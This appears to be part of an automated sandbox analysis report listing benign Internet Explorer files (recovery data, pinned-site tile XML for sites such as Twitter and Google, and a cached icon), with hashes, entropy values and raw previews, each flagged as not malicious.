                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C8-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:modified
                                                    Size (bytes):27864
                                                    Entropy (8bit):1.8262696484742256
                                                    Encrypted:false
                                                    SSDEEP:96:rmZhQh6rBSUjB22WuMqSe0q0UFRe0q0UOqZr:rmZhQh6rkUjB22WuMqS2FR2Pr
                                                    MD5:5145E97A2707090B38DBFC49D7B3B936
                                                    SHA1:9C74A28B3C263B5BCA7F575320EF1BAAA4A9AE7C
                                                    SHA-256:CAA0E11D0FBF8C6FFB96D078872CFD9666C183FB499494E1488848758E17721D
                                                    SHA-512:0A4CA0301A11762AA5C7012CF9C8E12BAE2DE5C5CB7698457943221CDA8B641243C7D85FC52F9FDB1B5308FB5A7C7219914E06E8CBCBB0EBCD79A443279AF9D7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D924C22A-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):369024
                                                    Entropy (8bit):3.622827487633413
                                                    Encrypted:false
                                                    SSDEEP:3072:qZ/2Bfcdmu5kgTzGtXZ/2Bfc+mu5kgTzGtDZ/2Bfcdmu5kgTzGtMZ/2Bfc+mu5kt:D0dPc
                                                    MD5:56C650A8FAE352DFCB33A65350377625
                                                    SHA1:E5850CF7CFFA999E85D959FAEB7FE1953F8F29EF
                                                    SHA-256:0DABB692137910901ADE64A19BD85F5471E9554D063DF547DBCD1987B62444B8
                                                    SHA-512:2341C43BE10F0F225857E1D3DC216AA08A18C2F0A8019B8C188711D195C34310A1C6A095B7364A2C77998420CA964BEDECBD3517D292AEC8FE66757F6E3AA6C9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DFA153C9-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):19032
                                                    Entropy (8bit):1.5836871089637126
                                                    Encrypted:false
                                                    SSDEEP:48:IwqGcpr3GwpaCG4pQ+GrapbS9GQpKxoG7HpR1TGIpX2WGApm:rOZhQy6wBSHAxzTjFNg
                                                    MD5:D6820582A289C637BAAC6A679714038E
                                                    SHA1:C9932725D3EE80CAAD749CFE17F83C0FA54DCE5D
                                                    SHA-256:FB105D359811A8AEEF46C5CE437C30AF109748C7171B4084E879DB8EA1CD691B
                                                    SHA-512:E984ECC1E1A0C7D30D424ECD1CCB579E11688A0E2FABEE9AC12359B7AA1E865869CD5079897C466E7B74322119AC3A94FEFA4DAD49A4BAA6B8D6C92F5038CF0D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EEB78589-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27428
                                                    Entropy (8bit):1.8643943465143213
                                                    Encrypted:false
                                                    SSDEEP:192:rKZBQ16DkYjt2NWLMTGUbc+IG/3RUbc+IG/DbkA:r2WgIakk4Cq+mq+Yv
                                                    MD5:6211F72E6A2E0676C47D6E085B0F1DA3
                                                    SHA1:7B707363358F0961C77329D678B97DE938CB9625
                                                    SHA-256:8112318C78A8C913913284A03A187C2ED7EDD7DB23C6B28A2B2BBBAED8B0190F
                                                    SHA-512:211BD5BDA234F2F90C8FC5CFCC36D1A79A30012398889AA36FC8490B97AAE08B6A07C09AD078B14B5E3B64BDC08F667BD533C90C904E7EF6B9912010F8978F43
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EEB7858B-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27364
                                                    Entropy (8bit):1.8434823592774872
                                                    Encrypted:false
                                                    SSDEEP:96:rnZoQY66BSiQjnJ2ZWNMlGD7v2lJ2RD7v2lJr7v8A:rnZoQY66k5jJ2ZWNMlGP2lQRP2lJ8A
                                                    MD5:9385B98EC61B2E59246236EFAB22AAF6
                                                    SHA1:602DBAAF5C30C68B7470F2D59E36446174B043BC
                                                    SHA-256:657F350E5135CF09135B4459B812B960FD9164F767C7A67D44F6FE862C43265A
                                                    SHA-512:DA19EEC53C7DF6FE85FEA71A66C86F3E23BBEA8CE6575697C39307E8C67A839E7AAA963B537BE6077F470312AAFAD5FDF9FF76CDABC9636A583228371C5B9703
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D2-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27364
                                                    Entropy (8bit):1.8465443252638856
                                                    Encrypted:false
                                                    SSDEEP:96:rCZp7QST6gXBSyjd2VWMMWGictw6YRictw6ocYA:rCZZQW6kkyjd2VWMMWGb6Rb6A
                                                    MD5:1655BE027791E82A8BFA867C2143102A
                                                    SHA1:FABF01A7C472D6AA728B0D8F1E991424DD4480CB
                                                    SHA-256:FA8D9784C7AC0A96A8A6EC69459586A0F242BF36B4FA76647E16C9694F6CD2E7
                                                    SHA-512:99734A905870E0156200355393DB3310DB49F4F1710B78D5D27A1D1691CB28AD8BB64AD5AB79A5172114A6883088AE031DC8F03B5432343EF5D499FFE5FBE005
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D4-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27368
                                                    Entropy (8bit):1.8451297139834941
                                                    Encrypted:false
                                                    SSDEEP:96:rcZ37QQd6OBSyjd2VWfMLiw16hvlNxw16hvlU6JA:rcZrQQd6Okyjd2VWfMLilhxl9JA
                                                    MD5:E19625BA77C69FDE66818B918050E434
                                                    SHA1:98FCB57FFBA22331EF413C1FA6D35B7FACE385F7
                                                    SHA-256:D93CE66F004B67385099F9DAF5EE53D0B536D0CA47C6CC8C73DB68D074567E8A
                                                    SHA-512:2E3F42BAFA36697178FBDA7A43F4CA9E52679AF11A13EF35548C220E0BC451447AC6B3DDC2421DF08B5D5581F8E4837797685E20DA4270C7FF0D780713E2E0DA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D6-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27356
                                                    Entropy (8bit):1.839945772068177
                                                    Encrypted:false
                                                    SSDEEP:96:rvZoQX6xBSCjh2VWGMwu5neXRrR5neXRCneOA:rvZoQX6xkCjh2VWGMwuWdRWIA
                                                    MD5:6F16E7846EE29F732AD8EDEDC490C461
                                                    SHA1:B607D0AB3B556BFD3893240864918ED159876C14
                                                    SHA-256:F1ECEDCCC9F8A13A140FA56A97890133233471A2A26461A852769E91E0CD95E8
                                                    SHA-512:18EDCA9F3A6694720F4A32B8179E3162600A29760F1DB0E375D98A49BF0C3D5BED3B8BE5C6D1E8E352187E6950511B63189E5FC79A3E3A80A65F8558B606F121
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FE7157D8-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27384
                                                    Entropy (8bit):1.852232997888497
                                                    Encrypted:false
                                                    SSDEEP:96:rOZdQx6XBSJijR2vtWvHMvVy5/M/8YR5/M/8YA:rOZdQx6XkJijR2FW/M9yCVRCFA
                                                    MD5:A4F3F266EFB2860A4F1D9F234E846C2D
                                                    SHA1:D040D8E6270F4EC80A2D905C643BF0FF705EAC00
                                                    SHA-256:EDDF27C53F7A8D3978C113C6EED741C9D19992B193A211F7337DEFED1812E222
                                                    SHA-512:A8E77D9011C0D6696817C2FB19587DCB28F45200CA6165ACF647BED8026CEE4756FFA3EB61C00860CB07D9DCEAC6E1D5344412BB04D9DC64E0B973E57DB7C018
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):656
                                                    Entropy (8bit):5.042726549573001
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxOEkkRvkRPCnWimI002EtM3MHdNMNxOEkkRvkRPCnWimI00ObVbkEtMb:2d6NxO4OYSZHKd6NxO4OYSZ76b
                                                    MD5:6A6DE00C5C6CC4CCCE0649B6F800F389
                                                    SHA1:D9F0971C5A86758DDCEAC3B7EAC0D94E18166200
                                                    SHA-256:2C4AFF4558994CE31349A799C7CF9AAD956FB7784DFE2250D4ADA154EB4093AD
                                                    SHA-512:1B9D0609D682B2C270E606B831A8B086A2EBE06BD72C1AF91C6B8C19758BBBE87A39861505CE778C9A4C86C6DFC817B4864D7DE27227D65E1768651B894919F5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):653
                                                    Entropy (8bit):5.096327248141829
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxe2kj+/G+/PCnWimI002EtM3MHdNMNxe2kj+/G+/PCnWimI00Obkak6Es:2d6Nxrq+u+SSZHKd6Nxrq+u+SSZ7Aa7b
                                                    MD5:DB742D46725F9BBD894A7EED16688F7A
                                                    SHA1:A508B951E089A320F7791EFB42B3F6EF7831CF4B
                                                    SHA-256:D4589635E57BB01E5A8B2CE39238C1464F798983C3AE4D8551FAE8BD68D774A6
                                                    SHA-512:EC22067D4EBBFDCB52A3DFCB78E78F41CF1A7B2AAC43A5CF3952CC436655DBC2D5D60FB20BDBD72A58408D0C0BCBF9C173D4C262F47CD705EC80B203A2929007
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb08a5e43,0x01d78310</date><accdate>0xb08a5e43,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xb08a5e43,0x01d78310</date><accdate>0xb08a5e43,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):662
                                                    Entropy (8bit):5.062339606985476
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxvLkkRvkRPCnWimI002EtM3MHdNMNxvLkkRvkRPCnWimI00ObmZEtMb:2d6NxvDOYSZHKd6NxvDOYSZ7mb
                                                    MD5:EA9DF6F276DE9734280E596912001F64
                                                    SHA1:4A16B3E19D7B26F497C6F6BA6C74E0FF1FD05270
                                                    SHA-256:C670769B64EA3951C903E91B1C5D4659CDB987116EB43BCC11F86E2991E3A42E
                                                    SHA-512:1D267019E3EDD0BE13CD93D4A4C2C2BE54C2A3DC2A6D191979622E8EDBAED5B5A735DA8EF0C7D5E4377191ECFF2A0AAE2D2B897282BF6BCCADDDC2440026C0E0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):647
                                                    Entropy (8bit):5.039111808233237
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxicvvxvvPCnWimI002EtM3MHdNMNxicvvxvvPCnWimI00Obd5EtMb:2d6NxTlCSZHKd6NxTlCSZ7Jjb
                                                    MD5:2C13C2FF7BE5B1AEB9901CAE7B2DAA54
                                                    SHA1:63CFE85A2872EB457F9CDC773B6276CDF2C3C34A
                                                    SHA-256:8BB969C7378126E16D0C01D28B1714AF8AE526CA1430348508B61A9E2E7C62A4
                                                    SHA-512:20B110C8255CD9CC4FC08141268841E712940F80EEC2629F22F2E889A3A3CE92B4606AD56D96D41BFAEDE4DE752A0A772B0B0FA0681C260517E73C8EF44BB24F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):656
                                                    Entropy (8bit):5.071494638877265
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxhGwkkRvkRPCnWimI002EtM3MHdNMNxhGwkkRvkRPCnWimI00Ob8K075t:2d6NxQsOYSZHKd6NxQsOYSZ7YKajb
                                                    MD5:7D85A53B0FBF4C2DC77F434EB842EC93
                                                    SHA1:2166F880FD6A8C977F9315F0A801825B1E6958FF
                                                    SHA-256:735219FB708300EC9270E00B2AC4AD9FFB5E2B47579BEFBD1EAF86A30302520E
                                                    SHA-512:9C85CE5B7F7D2FADF3FE7D03DF8CE09E1F3DF9E6C10D2668FDA58D3579C2AAF47BFE5E79C88401D9337EB1E2CC70CEBF403D15F994845BB33DD95BC73101E9EB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb0b8a81e,0x01d78310</date><accdate>0xb0b8a81e,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):653
                                                    Entropy (8bit):5.106331455783946
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNx0nFyPCnWimI002EtM3MHdNMNx0nFyPCnWimI00ObxEtMb:2d6Nx05SZHKd6Nx05SZ7nb
                                                    MD5:750D91217A235D33D2F6005D483617FE
                                                    SHA1:7F10D5F30C58C1957C47BEAE2B6F184FB2B83594
                                                    SHA-256:DED954807397375F9F005888C928C02C0F56F98924725F018AFF453F99F656F2
                                                    SHA-512:182A59C2085851E58408532B045EA4055D41F50D8934046CF8451CF6EDE3F789740F7E18EBFAFE54026C2151EA1168E76BD0340450127587154522C160858190
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb0b29d75,0x01d78310</date><accdate>0xb0b29d75,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xb0b29d75,0x01d78310</date><accdate>0xb0b29d75,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):656
                                                    Entropy (8bit):5.094350278507908
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxxcvvxvvPCnWimI002EtM3MHdNMNxxcvvyPCnWimI00Ob6Kq5EtMb:2d6Nx2lCSZHKd6Nx2PSZ7ob
                                                    MD5:A43601AE804818F43C8BB3F30A88D5F7
                                                    SHA1:C29EDCEFD26486ABC6E65A2B690BDF639B9B61C9
                                                    SHA-256:8EC6B5A16DE72DF74DD10DC4FBF124FFC316B8EC4F899E62ACD3C764C455A784
                                                    SHA-512:19EBBFF9FDAC87BB513FD45770B2E0724BF3AFCAF5FBEBAFA49B13C1E089B7CC25A8C4B27CB340128289D2312FB6DCC0973D850D858796B4532402BF8A3AF65B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xb0aa1c31,0x01d78310</date><accdate>0xb0b29d75,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):659
                                                    Entropy (8bit):5.124435257437636
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxcbsPCnWimI002EtM3MHdNMNxcbsPCnWimI00ObVEtMb:2d6NxESZHKd6NxESZ7Db
                                                    MD5:66656370322A80024210C436E78D0978
                                                    SHA1:AA0EA220E9DDA43DF45FA2293634BFB00155F65B
                                                    SHA-256:A75D3F0F02B48356A9D1EE46321803B5AE225D13EB8DC93CD2EAE74F90290FD8
                                                    SHA-512:68407E853456AD4178615491A53094F01EB7BDD5AC919D63D63460FCB1A7B2DD41F278DB5DCF9614CBE4CD8C15827A2F3D7946C51D5D3241CB0DEE7C8D0AFAB2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb099e255,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb099e255,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):653
                                                    Entropy (8bit):5.096798448194966
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdNMNxfnbsPCnWimI002EtM3MHdNMNxfnbxvvPCnWimI00Obe5EtMb:2d6NxhSZHKd6Nx5CSZ7ijb
                                                    MD5:A60A03F6CDE5D736EF7E9B603C94D2FE
                                                    SHA1:30EF39AD6EDA04B295BBBAF2455366883210EC92
                                                    SHA-256:04DDFA704A9FBBE39DCB5E85A39FC9D8919B4A585AE6803524CDFA1E53D20915
                                                    SHA-512:27B37E8C8B365D02BFDE430713C1E367BCB0BDBB0773A7650D8455DD5F9D5EDEE42DCEF6975179381DBAC773321D5EF5D58EED04EDC4480AB3B7B56755233913
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb099e255,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xb099e255,0x01d78310</date><accdate>0xb0aa1c31,0x01d78310</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):934
                                                    Entropy (8bit):7.019073291745009
                                                    Encrypted:false
                                                    SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGS:u6tWu/6symC+PTCq5TcBUX4bI
                                                    MD5:2E2CB8F3A2C7DC9A1CCDF8B599924B4E
                                                    SHA1:DDC0737C3C1767C28AC37B9617E3BF74DE1C1638
                                                    SHA-256:E973AF36500B83585E35062FE2DB2A3CBBFF061C5D983D2F36A8EC9F94740165
                                                    SHA-512:CE9076B84604AA7BBDDB85843C17486B440880F3C238A9A2F7386D80B5CB0EF93159716F5A649D7A79F7B4B1AE1963F4FA2C11D1A717508BCFBEF0FA2F9A7809
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ............H.a.....H.a....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAKp8YX[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):497
                                                    Entropy (8bit):7.3622228747283405
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                                    MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                                    SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                                    SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                                    SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=K.A.}{...3E..X.....`..S.A.k.l......X..g.FTD,....&D...3........^..of......B....d.....,.....P...#.P.....Y.~...8:..k..`.(.!1?......]*.E.'.$.A&A.F..._~.l....L<7A{G.....W.(.Eei..1rq....K....c.@.d..zG..|.?.B.)....`.T+.4...X..P...V .^....1..../.6.z.L.`...d.|t...;.pm..X...P]..4...{..Y.3.no(....<..\I...7T.........U..G..,.a..N..b.t..vwH#..qZ.f5;.K.C.f^L..Z..e`...lxW.....f...?..qZ....F.....>.t....e[.L...o..3.qX........IEND.B`.
